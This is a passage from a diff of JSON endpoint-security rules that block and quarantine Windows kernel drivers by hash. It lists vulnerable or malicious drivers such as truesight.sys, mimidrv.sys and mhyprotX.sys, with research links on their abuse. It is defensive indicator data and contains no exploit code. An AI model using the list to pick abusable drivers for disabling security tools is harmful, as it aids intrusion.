+}
+{
+ "id": "900bb33c-f029-5a8d-bc71-476abe9820fe",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.143131Z",
+ "creation_date": "2026-03-23T11:45:32.143133Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.143139Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "48dc7fd16aacdc8792f8bad1b1f7ca9d675ddac7767e957ea8c4227150d64e2d",
+ "comment": "Vulnerable Kernel Driver (aka echo_driver.sys) [https://www.loldrivers.io/drivers/afb8bb46-1d13-407d-9866-1daa7c82ca63/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "900eee8c-c13b-5f49-b500-b30e4d07a18b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.499896Z",
+ "creation_date": "2026-03-23T11:45:31.499899Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.499908Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f8fe6b40e491ea41c0e05145db2d7b159d8f493fa24418ef41d0e471667a076f",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9011eec4-ca53-59f8-a0e8-6951f6dc1939",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.157431Z",
+ "creation_date": "2026-03-23T11:45:31.157433Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.157442Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d5951534de51c39aefffaa4239b3da079dac96326fd0422e59edc6af0f00eada",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "901f2e46-bf0f-546d-b711-b5dc8a429014",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.830511Z",
+ "creation_date": "2026-03-23T11:45:30.830513Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.830518Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0c8caac32c31682d4732f78a47609b2069b65b3e73930106656f9b1d22845d08",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9021781b-66a2-52d9-8676-23120adc3bd1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.605358Z",
+ "creation_date": "2026-03-23T11:45:29.605360Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.605366Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ad556300b1417c4d78c5c17cc59d7c5e9360f76e49cfd0a4e9564fedf923c66d",
+ "comment": "Process Hacker driver (aka kprocesshacker.sys) [https://processhacker.sourceforge.io/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "902466c5-006c-59f3-85d3-6c9759492253",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.826174Z",
+ "creation_date": "2026-03-23T11:45:31.826176Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.826181Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7431b873a55857dc7a75419842e34a2e96f587182bf632d9d8db5fb497a41e19",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "90296bcc-22d0-5e92-86b0-835ecb16a717",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.147431Z",
+ "creation_date": "2026-03-23T11:45:31.147433Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.147438Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ab25cd1f115a6f3114a1355f54d20917df029080ba6e854169916ea27958b435",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "903198a8-912c-5ab7-b782-9884e48da682",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.465454Z",
+ "creation_date": "2026-03-23T11:45:30.465457Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.465466Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e4b2c0aa28aac5e197312a061b05363e2e0387338b28b23272b5b6659d29b1d8",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "90326a85-738a-5bd8-8800-287ddca8676a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.832514Z",
+ "creation_date": "2026-03-23T11:45:30.832516Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.832522Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e133d6ac51c2d412f49c73184a9069f2a5cbe78425857d78b06f88abd1ced25f",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9035ada6-17ed-5742-8779-aabb9bc12ab4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.827533Z",
+ "creation_date": "2026-03-23T11:45:31.827535Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.827540Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "39cc907dbc2bc08254ef115b2397aee842621201821312e5b7198e27e830b9d0",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "903eb15a-10a3-5fa3-b3e5-4c61c8ff2b98",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.479143Z",
+ "creation_date": "2026-03-23T11:45:31.479146Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.479155Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1f3f2c7e511a82c968dc61726d94ef2d902baf3a36174651c2d4d2ebec8b4efc",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "904471d3-657c-5b12-a9c0-530b60fd5686",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.143945Z",
+ "creation_date": "2026-03-23T11:45:31.143953Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.143958Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3c64fa4836d5ec14aa962edbb7fcb96d20b9b69e344ae9e93d7f531f9556c79d",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "904b5926-e363-56bf-be2e-dab0df354e76",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.973392Z",
+ "creation_date": "2026-03-23T11:45:29.973394Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.973401Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "99ddeba6bcdc79e52e3ff8afc63dbe4b299161cf0f5558a2d7630c2a18daf2c6",
+ "comment": "Voicemod Sociedad Limitada vulnerable driver (aka vmdrv.sys) [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "904fa457-6cfe-5221-ba7e-655c5f9d0dd9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.464735Z",
+ "creation_date": "2026-03-23T11:45:30.464738Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.464746Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3ca5d47d076e99c312578ef6499e1fa7b9db88551cfc0f138da11105aca7c5e1",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "90538aef-b31d-561c-a8ac-9567c83886c9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.811116Z",
+ "creation_date": "2026-03-23T11:45:31.811118Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.811124Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "96476a61d507d601964c5eb173933056925231126c3358e9a74a577b3bd0c171",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "905608ce-76f4-522a-a972-4635ea347b33",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.605192Z",
+ "creation_date": "2026-03-23T11:45:29.605194Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.605199Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f5f13feced4d8b332cadb0a77dcc36c9788a119dc16295bbdcd2c225ae326299",
+ "comment": "Process Hacker driver (aka kprocesshacker.sys) [https://processhacker.sourceforge.io/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "905aa587-6b07-5b27-b4e1-e42f4cee57ba",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.826866Z",
+ "creation_date": "2026-03-23T11:45:31.826937Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.826956Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "234037a78f11e067a0abafd8d871332ded2a413e58fa9ad551b86b36c3aa4585",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "905ae96f-f596-5e9c-a8a9-87f4f1fb5a5f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.612074Z",
+ "creation_date": "2026-03-23T11:45:29.612076Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.612082Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "faa37602095f25135312f87ed7adb607ffa5e9b2931b58d00f7376ed0c6ec69a",
+ "comment": "Genshin Impact vulnerable driver (aka mhyprotX.sys) [https://www.trendmicro.com/en_us/research/22/h/ransomware-actor-abuses-genshin-impact-anti-cheat-driver-to-kill-antivirus.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9068a806-2098-5670-b68a-91aab79f067d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.499721Z",
+ "creation_date": "2026-03-23T11:45:31.499724Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.499733Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9e17479d6e6ab766302ac95d2632b5f6a271a0a99df6286a31d08c21d77493f2",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "906ca3c6-2737-56e0-b168-8e5194af30b2",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.152084Z",
+ "creation_date": "2026-03-23T11:45:31.152087Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.152095Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5d3ef2066d3d22ce97f1fb3b39f5081acd1c34eab033ff139d80e95dab636e50",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "90768535-f58a-58d7-bfab-56c5adda1e02",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.479078Z",
+ "creation_date": "2026-03-23T11:45:31.479082Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.479092Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2f5938048e69ddddc2a30e1cc9b18e898fae74f119e9dfde73c417c96b912f42",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "907a5e99-c5e3-511c-89f5-fd4f7d3ef5a1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.622228Z",
+ "creation_date": "2026-03-23T11:45:29.622230Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.622236Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6991be9952aa08c0d2ac9fa728410ebdb44988b496ed01b8b7f478785ebb30c4",
+ "comment": "BioStar Racing GT EVO vulnerable driver (aka BS_RCIO64.sys) [CVE-2021-44852] [https://nephosec.com/biostar-exploit/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9090e885-0d80-550d-ab43-a879a161e87c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
